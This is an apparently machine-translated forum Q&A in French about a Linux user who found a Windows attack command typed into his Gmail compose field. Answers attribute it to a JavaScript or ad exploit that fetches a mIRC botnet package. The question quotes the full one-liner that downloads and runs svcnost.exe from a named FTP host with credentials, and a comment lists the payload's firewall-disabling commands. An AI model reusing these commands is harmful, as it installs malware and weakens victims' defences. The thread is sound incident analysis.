Question Comment identifier si mon ordinateur Linux a été piraté?


Mon ordinateur personnel est généralement allumé, mais le moniteur est éteint. Ce soir, je suis rentré du travail et j'ai trouvé ce qui ressemblait à une tentative de piratage: dans mon navigateur, mon compte Gmail était ouvert (c'était moi), mais il était en mode composition avec les éléments suivants: TO champ:

md / c echo ouvrir cCTeamFtp.yi.org 21 >> ik & echo utilisateur ccteam10 765824 >> ik & echo binaire >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit   echo Vous avez possédé

Cela ressemble à du code de ligne de commande Windows pour moi, et le md le début du code combiné avec le fait que Gmail était en mode composition, il est évident que quelqu'un a essayé de lancer un cmd commander. J'imagine que j'ai eu de la chance de ne pas utiliser Windows sur ce PC, mais j'en ai d'autres. C'est la première fois que quelque chose comme cela m'est arrivé. Je ne suis pas un gourou de Linux et je n'exécutais aucun autre programme que Firefox à ce moment-là.

Je suis absolument sûr que je n'ai pas écrit ceci, et personne d'autre n'était physiquement sur mon ordinateur. En outre, j'ai récemment changé mon mot de passe Google (et tous mes autres mots de passe) en quelque chose comme vMA8ogd7bv Je ne pense donc pas que quelqu'un ait piraté mon compte Google.

Qu'est-ce qui vient de se passer? Comment met-on les frappes sur mon ordinateur si ce n'est pas la vieille machine Windows qui a utilisé des logiciels malveillants pendant des années, mais une nouvelle installation récente d'Ubuntu?

Mettre à jour:
Permettez-moi de répondre à certains points et questions:

  • Je suis en Autriche, à la campagne. Mon routeur WLAN s'exécute WPA2/PSK et un mot de passe moyen-fort qui n'est pas dans le dictionnaire; devrait être la force brute et moins de 50 mètres d'ici; il est peu probable qu'il ait été piraté.
  • J'utilise un clavier filaire USB, donc à nouveau très peu probable que quiconque puisse être à portée de main pour le pirater.
  • Je n'utilisais pas mon ordinateur à ce moment-là. c'était juste au ralenti à la maison pendant que j'étais au travail. C'est un nettop PC monté sur moniteur, donc je l'éteins rarement.
  • La machine n’a que deux mois, ne fait tourner que Ubuntu, et je n’utilise pas de logiciels étranges ou de visites de sites étranges. Il s'agit principalement de Stack Exchange, Gmail et des journaux. Pas de jeux. Ubuntu est configuré pour rester à jour.
  • Je ne suis au courant d'aucun service VNC en cours d'exécution; Je n'ai certainement pas installé ou activé un. Je n'ai pas non plus démarré d'autres serveurs. Je ne sais pas si certains fonctionnent dans Ubuntu par défaut?
  • Je connais toutes les adresses IP dans l'activité de compte de Gmail. Je suis assez sûr que Google n'était pas une porte d'entrée.
  • j'ai trouvé un Visualiseur de fichier journal, mais je ne sais pas quoi chercher. Aidez-moi?

Ce que je veux vraiment savoir, c'est que ce qui me rend mal à l'aise, c'est: Comment quelqu'un sur Internet peut-il générer des frappes sur ma machine? Comment puis-je empêcher cela sans être tout à fait à ce sujet? Je ne suis pas un geek de Linux, je suis un père qui joue avec Windows depuis plus de 20 ans et j'en ai assez. Et pendant toutes les 18 années passées à être en ligne, je n'ai jamais vu personnellement de tentative de piratage, alors c'est nouveau pour moi.


126
2018-04-20 18:24


origine


Est-ce que quelqu'un d'autre a eu accès à votre ordinateur ou avez-vous un très vieux clavier sans fil? De plus, Ubuntu possède un serveur VNC intégré. Si cela est actif, un script aléatoire quelque part aurait pu se connecter et supposer qu'il s'agissait d'un ordinateur Windows, envoyant les frappes WIN + R, cmd ...... - TuxRug
@torbengb: Votre message vraiment me fait peur... - Mehrdad
Y a-t-il d'autres ordinateurs sur votre réseau sans fil? Si l'intrus s'est cassé leur la sécurité lui donnerait un "in" à votre réseau local, ce qui pourrait conduire à craquer la boîte Ubuntu de différentes manières. - CarlF
@muntoo ... et je suis sûr que vous ne l'avez pas écrit nulle part et n'utilisez aucune application pour les gérer non plus, non? Ne commençons pas à dénigrer les mots de passe; au moins mon mot de passe n'est pas password :-) - Torben Gundtofte-Bruun
As-tu un chat? - Zaki


Réponses:


Je doute que vous ayez quelque chose à craindre. Il était plus que probable qu’une attaque JavaScript ait tenté de faire une lecteur par téléchargement. Si vous êtes préoccupé par ce phénomène, commencez à utiliser NoScript et Adblock Plus Firefox Add-Ons.

Même en visitant des sites de confiance, vous n'êtes pas en sécurité car ils exécutent du code JavaScript provenant d'annonceurs tiers qui peuvent être malveillants.

Je l'ai attrapé et l'ai couru dans une VM. Il a installé mirc et c'est le journal d'état ... http://pastebin.com/Mn85akMk

Il s’agit d’une attaque automatisée qui essaie de vous amener à télécharger mIRC et à rejoindre un botnet qui vous transformera en un spambot ... Ma machine virtuelle s’est jointe et a établi une connexion avec plusieurs adresses distantes différentes, dont l’une est autoemail-119.west320.com.

En l'exécutant dans Windows 7 J'ai dû accepter l'invite UAC et lui permettre d'accéder via le pare-feu.

Il semble y avoir des tonnes de rapports de cette commande exacte sur d'autres forums, et quelqu'un dit même qu'un fichier torrent a essayé de l'exécuter lorsqu'il a fini de télécharger ... Je ne suis pas sûr de la façon dont cela serait possible.

Je ne l'ai pas utilisé moi-même, mais il devrait pouvoir vous montrer les connexions réseau actuelles afin que vous puissiez voir si vous êtes connecté à quelque chose de la norme: http://netactview.sourceforge.net/download.html


66
2018-04-20 18:41



Er, pourquoi tous les commentaires (Même le très hautement pertinent ceux qui ont découvert que le script a tenté d'ouvrir un cmd fenêtre) supprimé !? - BlueRaja - Danny Pflughoeft
Serais-je tout aussi sûr de ce type d'attaque si je commençais à utiliser uBlock Origin? - RobotUnderscore


je suis d'accord avec @ jb48394 c'est probablement un exploit JavaScript, comme tout le reste de nos jours.

Le fait qu'il ait essayé d'ouvrir un cmd fenêtre (voir Commentaire de @ torbengb) et exécuter une commande malveillante, plutôt que de simplement télécharger le cheval de Troie discrètement en arrière-plan, suggère exploite certaines vulnérabilités dans Firefox qui lui permettent d'entrer des raccourcis clavier, mais pas d'exécuter du code.

Cela explique également pourquoi cet exploit, qui était clairement écrit exclusivement pour Windows, fonctionnerait également sous Linux: Firefox exécute JavaScript de la même manière dans tous les systèmes d'exploitation  (au moins, il essaie de :)). Si cela était dû à un débordement de mémoire tampon ou à un exploit similaire conçu pour Windows, il aurait simplement planté le programme.

En ce qui concerne l'origine du code JavaScript - probablement une publicité Google malveillante (cycle d'annonces dans Gmail tout au long de la journée). Il ne serait pas  être  la  premier  temps.


41
2018-04-20 21:52



Belles références. - kizzx2
Pour les skimmers, ce dernier "lien" est en fait cinq liens distincts. - Pops
Ce serait vraiment choquant si c’est vraiment un exploit Javascript car mon Firefox reste normalement ouvert pendant des jours. Cependant, vous devez appeler une API spéciale pour envoyer les clés vers un autre système sous Windows et probablement un appel système différent (le cas échéant) sous Linux. Étant donné que l'envoi de séquences de touches n'est pas une opération Javascript normale, je doute que Firefox implémente un appel multi-plateforme pour cela. - billc.cn
@ billc.cn: Je crois que l'écriture sur le tampon du clavier PS / 2 fonctionne de la même manière quel que soit le système d'exploitation. - BlueRaja - Danny Pflughoeft


j'ai trouvé une attaque similaire sur une autre machine Linux. Il semble que ce soit une sorte de commande FTP pour Windows.


12
2018-04-20 18:36



Plus précisément, il télécharge et exécute le fichier ftp://ccteam10:765824@cCTeamFtp.yi.org/svcnost.exe en utilisant Windows ftp outil de ligne de commande. - grawity
l'a trouvé sur pastebin aussi pastebin.com/FXwRpKH4 - Shekhar
voici les infos sur le site whois.domaintools.com/216.210.179.67 - Shekhar
Il s'agit d'un package WinRAR SFX contenant une installation portable mIRC et un fichier appelé "DriverUpdate.exe". DriverUpdate.exe exécute (au moins) deux commandes shell: netsh firewall set opmode disable et Taskkill / F / IM VCSPAWN.EXE / T Il tente également (je pense) d'ajouter die-freesms-seite.com à la zone de confiance d'Internet Explorer et au contournement de proxy. - Andrew Lambert


Cela ne répond pas à votre question entière, mais dans le fichier journal, recherchez les tentatives de connexion ayant échoué.

S'il y a plus de cinq tentatives infructueuses dans votre journal, alors quelqu'un a essayé de craquer root. S'il y a une tentative réussie de connexion à root pendant votre absence, CHANGEZ VOTRE MOT DE PASSE IMMÉDIATEMENT !! Je veux dire maintenant! De préférence à quelque chose alphanumérique, et environ 10 caractères de long.

Avec les messages que vous avez (le echocommandes) cela ressemble vraiment à certains immatures script kiddie. Si c'était un vrai pirate informatique qui savait ce qu'il faisait, vous ne le sauriez probablement pas encore.


5
2018-04-21 04:13



Je suis d'accord que c'était évidemment très amateur. Au moins ils n'auraient pas dû mettre écho tu as été possédé à la fin. Je me demande si des "vrais pirates" ont réussi à passer? Ou bien je vais peut-être demander, combien? - Torben Gundtofte-Bruun
@torgengb: si la commande était exécutée dans une invite de commandes Windows, vous ne verriez pas l'écho (à cause de la &exit) - BlueRaja - Danny Pflughoeft


whois Les rapports west320.com appartiennent à Microsoft.

UPnP et Vino (Système -> Préférences -> Bureau à distance) associé à un mot de passe Ubuntu faible?

Avez-vous utilisé des référentiels non standard?

DEF CON a une compétition Wi-Fi chaque année pour savoir à quelle distance un point d'accès Wi-Fi peut être atteint - le dernier que j'ai entendu dire était 250 miles.

Si vous voulez vraiment avoir peur, regardez les captures d'écran d'un centre de contrôle-commande d'un Zeus botnet. Aucune machine n'est sûre, mais Firefox sous Linux est plus sûr que le reste. Encore mieux, si vous courez SELinux.


-1
2018-04-20 21:59



L'auteur de cet exploit n'avait clairement pas l'intention de l'exécuter sous Linux, alors je doute que cela ait à voir avec un utilitaire vulnérable ou un mot de passe faible (aussi, OP a déjà mentionné qu'il a un mot de passe sécurisé) - BlueRaja - Danny Pflughoeft
En fait, il ne mentionne pas avoir un mot de passe Ubuntu, juste un gmail et une phrase de passe sans fil. Un enfant qui exécute metasploit peut même ne pas connaître Linux, il ne voit que VNC. C'est très probablement une attaque javascript. - rjt